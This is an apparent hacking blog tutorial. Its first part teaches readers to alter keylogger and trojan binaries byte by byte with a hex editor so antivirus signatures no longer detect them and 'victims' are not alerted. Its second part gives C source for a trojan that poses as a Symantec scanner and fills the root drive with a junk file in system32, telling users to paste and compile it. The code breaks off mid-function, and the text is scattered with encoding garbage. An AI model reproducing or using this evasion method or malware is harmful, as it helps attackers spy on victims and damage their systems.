HOW TO MAKE A TROJAN,KEYLOGGERS,VIRUS

UNDETECTABLE BY ANTIVIRUS SOFTWARE-HEX

EDITING
Chinmoy Pratim Borah
No comments
Email This BlogThis! Share to Twitter Share to Facebook

HOW TO MAKE A TROJAN,KEYLOGGERS,VIRUS UNDETECTABLE

BY ANTIVIRUS SOFTWARE-HEX EDITING

I've been writing a lot about keylogging on this blog. Now as you know, most of the
keyloggers are detected by anti-virus softwares, so what you really want is a FUD
Keylogger (Fully Undetactable). That means no anti-virus software will alrert the
victim saying its a virus. There are very few FUD Keyloggers on web and the most of
the time you need to buy a keylogger that will be FUD for a long time. They normally
cost about 3$-20$, depending on the functions of the Builder.
Since the FUD keyloggers cost money, i decided to show you how to make them
undetectable for free, using hexediting method.
Here I will try to explain how to hexedit your favorite Trojan in order to make it
undetected by certain anti-virus programs. I will try to put this as simple as possible
so everyone understands it.
Content:
1.
2.
3.

General info about hexediting .

What tools you need to get started.
How to hex.
General info about hexediting
If you want to make your server undetectable, you need to know how AVs work and
how they detect your files, right? There are a few ways that AVs use to detect
your server heuristics, sandboxing, etc., and one of them is using so called
"definition files" that carry information about strings inside your server. Well, that's
the way we are going again in this tutorial because hexing is pretty much useless for
other methods of detection. So when AVs scan your files it searches for specific
stings on specific parts in your server, and if strings match with strings in the AV
database, your file is detected.
Let as say that detected strings are "XX" so we need to changethat string to
something else (e.g. "XY","YY") that isn't in the AV definition database so the file can

not be matched with any of the AV definitions and that way the file will be
undetectable. There are going to be a few tagged strings in your server - not only
one, depending on what trojan you are using and how popular is. Less popular
trojans tend to have less tagged parts, and with that they are easier to make it
undetectable.
First of all, hexing is not the best method for undetecting files because AVs can
change old tagged parts, and once your AV is updated, new definition files are
downloaded and your once undetected server might become detected again. Also
not all AVs use the same tagged parts - this way you need to hex your server against
more AVs to make it fully undetected. This can be annoying because you need to
download wanted AVs then hex it your server, then download another etc., etc.
Sometimes AVs tag critical parts of the server, and if that part is altered will
corrupt the server. Also, heavily edited servers can become unstable, some functions
might not work, or even you can corrupt your server and make it useless.
That's why you need to check your server if its still working after every single change
you made while hexing it.
Now how to find detected strings in your server?
There are few ways you can do this: Manually cut your server inhalf adding parts to
one half and scanning it until you find the detected string (which is slow and time
consuming); use file splitters to split your server into bytes, and after that scan all
split files and find out what byte is detected then alter it in original exe, or you can
use an offset AV .
What tools you need to get started

Unpacked trojan/keylogger server. (That's your virus)

Hex editor > Download
Av devil > Download
File Splitter > Download(Optional)
AV-antivirus
How to hex
-Step 1.
Turn your AV real-time protection
***65533;***65533;OFF***65533;***65533; . Make your
Trojan server and
make sure that is not packed.
Open AV Devil and select your server. After selecting, the server
msg will pop up
click OK, and the next msg will popup asking you to turn your AV
real-time
protection back ***65533;***65533;ON***65533;***65533;.
After you do that just click "OK" and lets AV Devil
search for detected offsets.
During the search your AV will pop up a couple of times. Just click
on "Skip" and let
AV Devil finish.

After its done you will see something like this:

As you can see this Trojan server has only two detected offsets.
That means that first detected offset begins at 53F7 and ends at
5476.
Also you can see where the second offset starts and ends.
That***65533;***65533;s the part that the AV
is checking in this definition database. If the part in the server
matches with part in
AV database your server is detected. You can hex beginning and
ending offset or in
between.
Step 2.

Now when we have detected offsets, we open our server in Hex

WorkShop. Type
"Ctrl+G" and this will come up:

Type the first offset in, select from

***65533;***65533;Beginning of File,***65533;***65533;
and make sure that you
selected "hex," because offsets in AV Devil are displayed in that
manner. Unless you
save via AV Devil, then they are converted into a decimal. Click
***65533;***65533;Go***65533;***65533; and you will
be sent to that offset location. Now we need to change that
***65533;***65533;31***65533;***65533; to something
else, so
we will change it to
***65533;***65533;32***65533;***65533;.

Select ***65533;***65533;31***65533;***65533; right click

to it and select fill.

You will see the window below. In ***65533;***65533;Fill with

the following hex byte***65533;***65533; we are going to
fill in ***65533;***65533;32***65533;***65533; and hit OK.

After clicking ***65533;***65533;OK,***65533;***65533;

the changed hex byte going to be shown in red.
[slika]http://img377.imageshack.us/img377/876/slika6gy9.jpg[
/img]
__________________________________________________
__________________
Now repeat this for every offset that you found in AV Devil.

__________________________________________________
___________________
Going to change it
***65533;***65533;FE***65533;***65533; to
***65533;***65533;EE***65533;***65533; and so on for all
other detected offsets.

Once you***65533;***65533;ve completedediting all offsets,

save your server and scan if it***65533;***65533;s UD, and
then you***65533;***65533;re done. If the AV still detecting it,
repeat steps 1 and 2.
Here***65533;***65533;s a little tip on how to change detected
bytes: Try to make minor changes like
32 =>31, 22, 42, 33, 34, or FE =>EE ,FF etc., etc. Basically, one
character up/down
for each - that***65533;***65533;s the best way and
will minimize chances to corrupt your server. If that
doesn***65533;***65533;t work for some reason, you can try
and change it to something completely
different, but always check your server after editing bytes. That
way you can see if the
server works or if it***65533;***65533;s corrupted (you can
keep track of what change caused the
corruption and you can try and edit that byte with some other
character).
Another thing in some Trojans servers is that AV Devil
can***65533;***65533;t find the beginning of the
first offset and will mark it with
***65533;***65533;0.***65533;***65533;
Let***65533;***65533;s say you***65533;***65533;ve
hexed all other found offsets
but your server is still detected. Split the file into half and run AV
Devil on the first
half. That way you will be able to find the first offset that
is missing and finish your
hexing. If some tagged part is a letter, e.g.
***65533;***65533;Y***65533;***65533; change it to
***65533;***65533;y***65533;***65533; or just PlAy wItH
ThE CaPs.
Ex:

So there you have it! Now you know how to hex your server and
make it undetected
from wanted AVs.

How to make Trojan using 'C' language

31/07/2009 15:58
This program is written in 'C' language . you jast have to paste these lines to 'C' compiler
& then make an executable file.
/* SPACE EATER TROJAN BY SUKHDEEP. USE IT FOR EDUCATIONAL PURPOSES ONLY.
DO NOT SPREAD!*/
#include
#include
#include
#include
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);
void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS
PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER
IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE
TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU
WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");
if((choice=getch())!=13)
exit(0);
}
void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}
void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)

{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();

}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}
void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");

Read more: http://hacking-tricks.webnode.com/news/how-to-make-trojan-using-c-language/

Create your own website for free: http://www.webnode.com